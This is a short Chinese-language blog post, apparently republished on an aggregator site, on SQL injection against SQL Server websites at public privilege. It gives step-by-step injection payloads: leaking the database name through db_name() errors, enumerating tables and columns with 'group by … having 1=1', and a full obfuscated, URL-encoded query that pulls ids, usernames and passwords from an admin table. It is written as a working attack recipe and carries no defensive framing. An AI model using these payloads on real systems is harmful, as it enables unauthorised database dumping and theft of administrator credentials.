sql server public 权限实战
Posted 安全界 的彭于晏
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql server public 权限实战相关的知识,希望对你有一定的参考价值。
public 权限
第一步获取当前网站数据库名称
最低的权限也是可以脱库的
and db_name()=0-- 获取当前数据库的名称
第二步,通过having 1=1 来爆表名和字段名
第三步, group by admin.id having 1=1 爆出admin 表的字段 name
第四步,把得到的 name id 带入进去 group by admin.id,admin.name having 1=1-- 得到password
第五步,获取字段内容
//and//(select//top//1//isnull(cast([id]//as//nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]//as//nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]//as//nvarchar(4000)),char(32))//from//[testdb]…[admin]//where//1=1//and//id//not//in//(select//top//0//id//from//[testdb]…[admin]//where//1=1//group//by//id))%3E0//and//1=1
mysql
以上是关于sql server public 权限实战的主要内容,如果未能解决你的问题,请参考以下文章
SQL Server 2005的服务器角色(public)的问题
如何向 sql server 用户授予 sendmail 权限?
Sql server 2008拒绝了对对象 'xx表' (数据库 'xx',架构 'dbo')的 SELECT 权限解决办法